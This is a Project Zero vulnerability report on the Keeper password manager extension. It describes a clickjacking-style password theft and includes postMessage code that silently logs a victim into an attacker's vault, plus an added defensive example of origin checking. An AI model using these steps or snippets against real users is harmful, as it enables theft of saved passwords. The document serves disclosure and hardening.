Monorail Project: project-zero
Issue 917 Keeper: Trusted UI is injected into untrusted webpage
Reported by taviso@google.com (Project Member), Aug 26 2016
Status: Fixed
Closed: Nov 1
I took a quick look at Keeper, a password manager for Windows, Mac, Linux. The extension injects its trusted UI into untrusted webpages with a content script. I don't think that's safe to do.

I'm not a web developer, but you can see what I mean in the attached example. I only tested it in Chrome.

A more polished example is obviously possible.

The example does this:

1. Click the little keeper icon you add to input boxes, that's just: document.getElementById('keeper-icon-2').click();
2. Click the search button in the popup that appears.
3. Search for "Google", e.g. document.getElementById('keeper-search-box-input').value="Google"
4. wait for the search results to appear, then hide the iframe.
5. When the user is about to click, display it and then wait for the password to be inserted.
6. Now the page can read the password.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Comment 1 Deleted
Comment 2 by taviso@google.com (Project Member), Aug 26 2016
I tried to make the example more reliable.

Attachment: keeper.html (5.0 KB)
Comment 3 Deleted
Comment 4 by taviso@google.com (Project Member), Aug 26 2016
Keeper sent me an updated build that removes the search feature I was using. I suppose that solves the immediate problem. I noticed that the way messages were passed didn't seem safe though.

For example, it's possible to log someone into your account and then when they save their passwords, they're effectively giving them to you.

For example a website can do this:

x = window.open("https://keepersecurity.com/vault/");   // opener keeps a handle to the vault window
// the body claims to come from the extension; nothing checks where it really came from
x.postMessage({client: "ext", cmd: "logout"}, "*");
x.postMessage({client: "ext", cmd: "login", login: "attacker@account.com", password: "attackerspassword"}, "*");

And now whenever you save a password, you're unknowingly saving it to the attackers. I asked why there isn't a check for message.origin == "chrome-extension://...", etc.
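
The missing check described in the comment above, as an added example that is not Keeper's code: a "message" handler for a vault page in the unsafe shape (it trusts a "client" field inside the message body, which any sender can set) next to a hardened one that checks event.origin, a field the browser fills in and the sender cannot forge. The extension id, the command set, the attacker origin and the replayed message events are all assumptions constructed for this example.

```javascript
// Added example, not Keeper's code. The extension id, the command set and the
// message events below are assumptions constructed for illustration.

const TRUSTED_ORIGINS = new Set([
  "chrome-extension://abcdefghijklmnopabcdefghijklmnop", // assumed extension id
]);

// Minimal stand-in for the vault's session state so each handler's effect is visible.
function makeVault() {
  return { user: "victim@example.com", log: [] };
}

function applyCommand(vault, msg) {
  switch (msg.cmd) {
    case "logout":
      vault.user = null;
      vault.log.push("logout");
      return true;
    case "login":
      vault.user = msg.login;
      vault.log.push("login as " + msg.login);
      return true;
    default:
      return false;
  }
}

// Unsafe: any window holding a reference to the vault (for example the opener
// that called window.open) can post {client: "ext", ...} and is treated as the extension.
function unsafeHandler(vault, event) {
  const msg = event.data;
  if (!msg || msg.client !== "ext") return false;
  return applyCommand(vault, msg);
}

// Hardened: reject anything not sent from the extension's own origin before
// looking at the body. event.origin is set by the browser from the sender's
// real origin, so a page on https://attacker.example cannot spoof it.
function safeHandler(vault, event) {
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    vault.log.push("rejected message from " + event.origin);
    return false;
  }
  const msg = event.data;
  if (!msg || msg.client !== "ext") return false;
  return applyCommand(vault, msg);
}

// The two messages from the comment above, replayed against a handler as
// constructed MessageEvent-like objects from an attacker-controlled origin.
function replayAttack(handler) {
  const vault = makeVault();
  const from = "https://attacker.example"; // constructed attacker origin
  const events = [
    { origin: from, data: { client: "ext", cmd: "logout" } },
    { origin: from, data: { client: "ext", cmd: "login",
                            login: "attacker@account.com", password: "attackerspassword" } },
  ];
  for (const ev of events) handler(vault, ev);
  return vault;
}

// The same commands sent from the extension's own origin, to show the hardened
// handler still serves the legitimate caller.
function replayLegit(handler) {
  const vault = makeVault();
  const from = "chrome-extension://abcdefghijklmnopabcdefghijklmnop";
  handler(vault, { origin: from, data: { client: "ext", cmd: "logout" } });
  handler(vault, { origin: from, data: { client: "ext", cmd: "login",
                                         login: "user@example.com", password: "hunter2" } });
  return vault;
}

// In a real page this is the only wiring needed; guarded so the file also runs under node.
if (typeof window !== "undefined") {
  const vault = makeVault();
  window.addEventListener("message", (ev) => safeHandler(vault, ev));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", replayAttack(unsafeHandler).user); // attacker@account.com
  console.log("safe:  ", replayAttack(safeHandler).user);   // victim@example.com
}
```

The same rule applies in the other direction: when the vault page replies to the extension, pass the extension's origin as the targetOrigin argument of postMessage rather than "*", so a reply carrying secrets is never delivered to a window that happens to hold the handle.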

Comment 5 by taviso@google.com (Project Member), Aug 27 2016
I uploaded the example here for testing.

https://lock.cmpxchg8b.com/keeper.html
Comment 6 by taviso@google.com (Project Member), Aug 27 2016
Labels: -Restrict-View-Commit
Summary: Keeper: Trusted UI is injected into untrusted webpage (was: Keeper: trusted UI is injected into untrusted webpage)
It looks like the 10.1.3 update is live on the chrome web store, removing view restriction.
This issue has been fixed with Keeper Browser Extension v10.1.3, which is live on the Chrome web store. Below is the blog post related to the issue:

https://blog.keepersecurity.com/2016/08/28/security-update-for-keeper-browser-extension/

Comment 8 by taviso@google.com (Project Member), Nov 1
Status: Fixed